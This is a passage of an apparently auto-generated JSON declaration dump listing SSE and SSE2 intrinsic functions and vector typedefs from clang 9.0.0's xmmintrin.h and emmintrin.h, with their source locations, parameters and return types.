"/usr/lib/clang/9.0.0/include/xmmintrin.h:1412:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvttss_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1432:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_cvttps_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1451:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cvtt_ps2pi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1468:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cvtsi32_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1490:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvt_si2ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1513:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtsi64_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1537:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtpi32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1563:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvt_pi2ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1586:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtss_f32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1603:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_loadh_pi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1624:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m64" } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_loadl_pi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1651:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m64" } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_load_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1678:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_load1_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1700:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_load_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1723:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_loadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1740:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_loadr_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1762:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_undefined_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1776:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_set_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1796:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_set1_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1814:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_set_ps1", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1833:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_set_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1860:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__z", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__w", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_setr_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1888:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__z", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__w", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_setzero_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1903:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_storeh_pi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1920:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m64" } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storel_pi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1941:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m64" } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_store_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1962:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storeu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:1983:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_store_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2004:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_store1_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2023:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_store_ps1", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2043:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storer_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2062:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_stream_pi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2120:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m64" } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_stream_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2139:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_sfence", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2157:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_max_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2231:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_max_pu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2250:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_min_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2269:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_min_pu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2288:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_movemask_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2306:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_mulhi_pu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2325:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_maskmove_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2388:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__d", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__n", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_avg_pu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2407:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_avg_pu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2426:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_sad_pu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2448:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_getcsr", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2507:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_setcsr", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2561:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "__i", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_unpackhi_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2624:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_unpacklo_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2646:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_move_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2668:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_movehl_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2690:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_movelh_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2711:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtpi16_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2729:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtpu16_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2759:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtpi8_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2788:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtpu8_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2813:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtpi32x2_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2840:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtps_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2869:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cvtps_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2899:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_movemask_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2924:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__m128d", "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:15:16", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m128i", "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:16:19", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m128d_u", "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:18:16", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m128i_u", "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:19:19", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v2df", "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:22:16", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v2di", "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:23:19", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v8hi", "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:24:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v16qi", "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:25:14", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v2du", "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:28:28", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v8hu", "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:29:24", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v16qu", "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:30:23", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v16qs", "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:34:21", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "function", "name": "_mm_add_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:56:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_add_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:75:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_sub_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:98:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_sub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:117:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mul_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:139:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mul_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:158:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_div_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:181:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_div_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:201:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_sqrt_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:226:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_sqrt_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:244:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_min_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:268:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_min_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:288:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_max_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:312:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_max_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:332:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_and_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:350:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_andnot_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:371:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_or_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:389:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_xor_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:407:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], 